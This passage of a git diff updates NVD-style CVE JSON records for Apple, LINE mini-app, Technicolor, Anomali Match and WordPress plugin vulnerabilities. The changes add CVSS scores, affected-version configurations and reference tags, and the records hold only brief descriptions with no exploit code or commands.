"weaknesses": [
{
"source": "PSIRT-CNA@flexerasoftware.com",
"type": "Secondary",
"description": [
{
"lang": "en",
"value": "CWE-276"
}
]
}
],
"references": [
{
"url": "https://community.flexera.com/t5/InstallShield-Knowledge-Base/CVE-2023-29081-InstallShield-Symlink-Vulnerability-Affecting/ta-p/305052",
"source": "PSIRT-CNA@flexerasoftware.com"
}
]
}

143
CVE-2023/CVE-2023-405xx/CVE-2023-40528.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-40528",
"sourceIdentifier": "product-security@apple.com",
"published": "2024-01-23T01:15:09.620",
"lastModified": "2024-01-26T17:15:09.730",
"vulnStatus": "Undergoing Analysis",
"lastModified": "2024-01-26T20:06:08.767",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,47 +14,164 @@
"value": "Este problema se solucion\u00f3 eliminando el c\u00f3digo vulnerable. Este problema se solucion\u00f3 en tvOS 17, watchOS 10, macOS Sonoma 14, iOS 17 y iPadOS 17, macOS Ventura 13.6.4. Es posible que una aplicaci\u00f3n pueda eludir las preferencias de privacidad."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*",
"versionEndExcluding": "17.0",
"matchCriteriaId": "B511B802-B0A2-412D-ADA4-8B783BDF1880"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*",
"versionEndExcluding": "17.0",
"matchCriteriaId": "E22CC7F9-F302-40B1-9B02-00FBC9805199"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*",
"versionStartIncluding": "13.0",
"versionEndExcluding": "13.6.4",
"matchCriteriaId": "A3916CD8-E6D5-4786-903E-B86026859CE6"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*",
"versionEndExcluding": "17.0",
"matchCriteriaId": "93620AD0-115A-4F86-B533-76A190AF41A0"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*",
"versionEndExcluding": "10.0",
"matchCriteriaId": "5A079CEF-8220-487C-B114-30BCC45647D6"
}
]
}
]
}
],
"references": [
{
"url": "http://seclists.org/fulldisclosure/2024/Jan/37",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://support.apple.com/en-us/HT213936",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/en-us/HT213937",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/en-us/HT213938",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/en-us/HT213940",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/en-us/HT214058",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/kb/HT213936",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/kb/HT213937",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/kb/HT213938",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/kb/HT213940",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
}
]
}

65
CVE-2023/CVE-2023-428xx/CVE-2023-42881.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-42881",
"sourceIdentifier": "product-security@apple.com",
"published": "2024-01-23T01:15:09.840",
"lastModified": "2024-01-23T13:44:14.167",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T20:50:42.450",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,11 +14,68 @@
"value": "El problema se solucion\u00f3 mejorando el manejo de la memoria. Este problema se solucion\u00f3 en macOS Sonoma 14.2. El procesamiento de un archivo puede provocar la finalizaci\u00f3n inesperada de la aplicaci\u00f3n o la ejecuci\u00f3n de c\u00f3digo arbitrario."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*",
"versionEndExcluding": "14.2",
"matchCriteriaId": "A640ED58-0863-434D-B8B3-1FBF3B8D559D"
}
]
}
]
}
],
"references": [
{
"url": "https://support.apple.com/en-us/HT214036",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
}
]
}

90
CVE-2023/CVE-2023-428xx/CVE-2023-42887.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-42887",
"sourceIdentifier": "product-security@apple.com",
"published": "2024-01-23T01:15:09.910",
"lastModified": "2024-01-26T17:15:09.823",
"vulnStatus": "Undergoing Analysis",
"lastModified": "2024-01-26T20:51:20.893",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,23 +14,99 @@
"value": "Se solucion\u00f3 un problema de acceso con restricciones adicionales de la sandbox. Este problema se solucion\u00f3 en macOS Ventura 13.6.4, macOS Sonoma 14.2. Es posible que una aplicaci\u00f3n pueda leer archivos arbitrarios."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 6.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 1.8,
"impactScore": 4.0
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*",
"versionStartIncluding": "13.0",
"versionEndExcluding": "13.6.4",
"matchCriteriaId": "A3916CD8-E6D5-4786-903E-B86026859CE6"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*",
"versionStartIncluding": "14.0",
"versionEndExcluding": "14.2",
"matchCriteriaId": "6892DEBD-024E-414B-9282-DCCCF23A3BDD"
}
]
}
]
}
],
"references": [
{
"url": "http://seclists.org/fulldisclosure/2024/Jan/37",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://support.apple.com/en-us/HT214036",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/en-us/HT214058",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/kb/HT214036",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
}
]
}

177
CVE-2023/CVE-2023-428xx/CVE-2023-42888.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-42888",
"sourceIdentifier": "product-security@apple.com",
"published": "2024-01-23T01:15:09.980",
"lastModified": "2024-01-26T17:15:09.883",
"vulnStatus": "Undergoing Analysis",
"lastModified": "2024-01-26T20:53:27.637",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,55 +14,202 @@
"value": "El problema se solucion\u00f3 con controles mejorados. Este problema se solucion\u00f3 en iOS 16.7.5 y iPadOS 16.7.5, watchOS 10.2, macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 17.2 y iPadOS 17.2. El procesamiento de una imagen creada con fines malintencionados puede provocar la divulgaci\u00f3n de la memoria del proceso."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*",
"versionStartExcluding": "16.0",
"versionEndExcluding": "16.7.5",
"matchCriteriaId": "8C2307FA-1412-4727-AD29-541A337A9B97"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*",
"versionStartExcluding": "17.0",
"versionEndExcluding": "17.2",
"matchCriteriaId": "BF97C4D2-4449-4290-A381-BCFB7C78FC99"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*",
"versionStartExcluding": "16.0",
"versionEndExcluding": "16.7.5",
"matchCriteriaId": "78404384-8393-4F57-8076-C84BCFD58B1D"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*",
"versionStartExcluding": "17.0",
"versionEndExcluding": "17.2",
"matchCriteriaId": "4F224E57-6480-44EE-B718-9C09F3B51810"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*",
"versionStartIncluding": "12.0",
"versionEndExcluding": "12.7.3",
"matchCriteriaId": "ECD0F581-7DA4-428A-A1F5-C9A86DDD99D7"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*",
"versionStartIncluding": "13.0",
"versionEndExcluding": "13.6.4",
"matchCriteriaId": "A3916CD8-E6D5-4786-903E-B86026859CE6"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*",
"versionStartIncluding": "14.0",
"versionEndExcluding": "14.2",
"matchCriteriaId": "6892DEBD-024E-414B-9282-DCCCF23A3BDD"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*",
"versionEndExcluding": "10.2",
"matchCriteriaId": "1183933F-F52A-45A7-B118-FC8B8BDD5509"
}
]
}
]
}
],
"references": [
{
"url": "http://seclists.org/fulldisclosure/2024/Jan/34",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://seclists.org/fulldisclosure/2024/Jan/37",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://seclists.org/fulldisclosure/2024/Jan/38",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://support.apple.com/en-us/HT214035",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/en-us/HT214036",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/en-us/HT214041",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/en-us/HT214057",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/en-us/HT214058",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/en-us/HT214063",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/kb/HT214035",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/kb/HT214036",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
},
{
"url": "https://support.apple.com/kb/HT214041",
"source": "product-security@apple.com"
"source": "product-security@apple.com",
"tags": [
"Release Notes",
"Vendor Advisory"
]
}
]
}

64
CVE-2023/CVE-2023-439xx/CVE-2023-43998.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-43998",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-24T10:15:09.287",
"lastModified": "2024-01-24T13:49:03.187",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T20:34:28.980",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,11 +14,67 @@
"value": "Un problema en la mini-app Books-futaba en Line v13.6.1 permite a los atacantes enviar notificaciones maliciosas manipuladas mediante la fuga del token de acceso al canal."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 2.5
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:linecorp:line:13.6.1:*:*:*:*:*:*:*",
"matchCriteriaId": "22743D41-3381-4220-8D9F-60CC36E48F78"
}
]
}
]
}
],
"references": [
{
"url": "https://github.com/syz913/CVE-reports/blob/main/CVE-2023-43998.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

64
CVE-2023/CVE-2023-439xx/CVE-2023-43999.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-43999",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-24T10:15:09.343",
"lastModified": "2024-01-24T13:49:03.187",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T20:34:08.233",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,11 +14,67 @@
"value": "Un problema en la mini-app COLORFUL_laundry en Line v13.6.1 permite a los atacantes enviar notificaciones maliciosas manipuladas mediante la fuga del token de acceso al canal."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 2.5
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:linecorp:line:13.6.1:*:*:*:*:*:*:*",
"matchCriteriaId": "22743D41-3381-4220-8D9F-60CC36E48F78"
}
]
}
]
}
],
"references": [
{
"url": "https://github.com/syz913/CVE-reports/blob/main/CVE-2023-43999.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

64
CVE-2023/CVE-2023-440xx/CVE-2023-44001.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-44001",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-24T10:15:09.440",
"lastModified": "2024-01-24T13:49:03.187",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T20:00:50.610",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,11 +14,67 @@
"value": "Un problema en la mini-app de la cl\u00ednica Ailand en Line v13.6.1 permite a los atacantes enviar notificaciones maliciosas manipuladas mediante la fuga del token de acceso al canal."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 2.5
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:linecorp:line:13.6.1:*:*:*:*:*:*:*",
"matchCriteriaId": "22743D41-3381-4220-8D9F-60CC36E48F78"
}
]
}
]
}
],
"references": [
{
"url": "https://github.com/syz913/CVE-reports/blob/main/CVE-2023-44001.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

90
CVE-2023/CVE-2023-473xx/CVE-2023-47352.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-47352",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-22T05:15:08.307",
"lastModified": "2024-01-22T14:01:09.553",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:27:53.397",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,23 +14,99 @@
"value": "Los dispositivos Technicolor TC8715D tienen contrase\u00f1as de seguridad WPA2 predeterminadas y predecibles. Un atacante que busque valores SSID y BSSID puede predecir estas contrase\u00f1as."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "ADJACENT_NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
]
}
],
"configurations": [
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:technicolor:tc8715d_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FB69B6E9-87B6-4585-BBE5-27F8201D71B4"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:technicolor:tc8715d:-:*:*:*:*:*:*:*",
"matchCriteriaId": "A0876B4E-4BFD-4E52-B4E6-1AD6B82F461B"
}
]
}
]
}
],
"references": [
{
"url": "https://github.com/actuator/Technicolor/blob/main/TC8715D.png",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Broken Link"
]
},
{
"url": "https://github.com/actuator/cve/blob/main/Technicolor/CVE-2023-47352",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://i.ebayimg.com/images/g/d4EAAOSwV01kEM26/s-l1600.jpg",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Product"
]
},
{
"url": "https://i.ebayimg.com/images/g/zp8AAOSwbNpkEM26/s-l1600.jpg",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Product"
]
}
]
}

89
CVE-2023/CVE-2023-493xx/CVE-2023-49329.json
View File

@ -2,23 +2,102 @@
"id": "CVE-2023-49329",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T21:15:08.320",
"lastModified": "2024-01-19T22:52:48.170",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:01:44.507",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "Anomali Match before 4.6.2 allows OS Command Injection. An authenticated admin user can inject and execute operating system commands. This arises from improper handling of untrusted input, enabling an attacker to elevate privileges, execute system commands, and potentially compromise the underlying operating system. The fixed versions are 4.4.5, 4.5.4, and 4.6.2. The earliest affected version is 4.3."
},
{
"lang": "es",
"value": "Anomali Match anterior a 4.6.2 permite la inyecci\u00f3n de comandos del sistema operativo. Un usuario administrador autenticado puede inyectar y ejecutar comandos del sistema operativo. Esto surge del manejo inadecuado de entradas que no son de confianza, lo que permite a un atacante elevar privilegios, ejecutar comandos del sistema y potencialmente comprometer el sistema operativo subyacente. Las versiones fijas son 4.4.5, 4.5.4 y 4.6.2. La primera versi\u00f3n afectada es la 4.3."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-78"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:anomali:match:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.3",
"versionEndExcluding": "4.4.5",
"matchCriteriaId": "D724A998-B623-4BA3-ACA4-D3DAE7AC5483"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:anomali:match:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.5.0",
"versionEndExcluding": "4.5.4",
"matchCriteriaId": "47A5D64F-FEE5-4F28-A3D4-CE2F284A40D4"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:anomali:match:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.6.0",
"versionEndExcluding": "4.6.2",
"matchCriteriaId": "5DD4E68B-AA7A-4E44-B603-84DD03E325DB"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://www.anomali.com/collaborate/ciso-blog",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Product"
]
},
{
"url": "https://www.anomali.com/security-advisory/anml-2023-01",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Mitigation",
"Vendor Advisory"
]
}
]
}

69
CVE-2023/CVE-2023-62xx/CVE-2023-6290.json
View File

@ -2,19 +2,80 @@
"id": "CVE-2023-6290",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-22T20:15:47.457",
"lastModified": "2024-01-22T20:28:17.417",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:36:13.877",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The SEOPress WordPress plugin before 7.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed"
},
{
"lang": "es",
"value": "El complemento SEOPress de WordPress anterior a 7.3 no sanitiza ni escapa a algunas de sus configuraciones, lo que podr\u00eda permitir a usuarios con altos privilegios, como el administrador, realizar ataques de Cross-Site Scripting incluso cuando unfiltered_html no est\u00e1 permitido."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:seopress:seopress:*:*:*:*:*:wordpress:*:*",
"versionEndExcluding": "7.3",
"matchCriteriaId": "0F26C01F-6880-4768-90F3-2F084EF46391"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://wpscan.com/vulnerability/78a13958-cd12-4ea8-b326-1e3184da970b/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

69
CVE-2023/CVE-2023-63xx/CVE-2023-6384.json
View File

@ -2,19 +2,80 @@
"id": "CVE-2023-6384",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-22T20:15:47.507",
"lastModified": "2024-01-22T20:28:17.417",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:41:47.807",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The WP User Profile Avatar WordPress plugin before 1.0.1 does not properly check for authorisation, allowing authors to delete and update arbitrary avatar"
},
{
"lang": "es",
"value": "El complemento WP User Profile Avatar de WordPress anterior a 1.0.1 no verifica correctamente la autorizaci\u00f3n, lo que permite a los autores eliminar y actualizar avatares arbitrarios."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM"
},
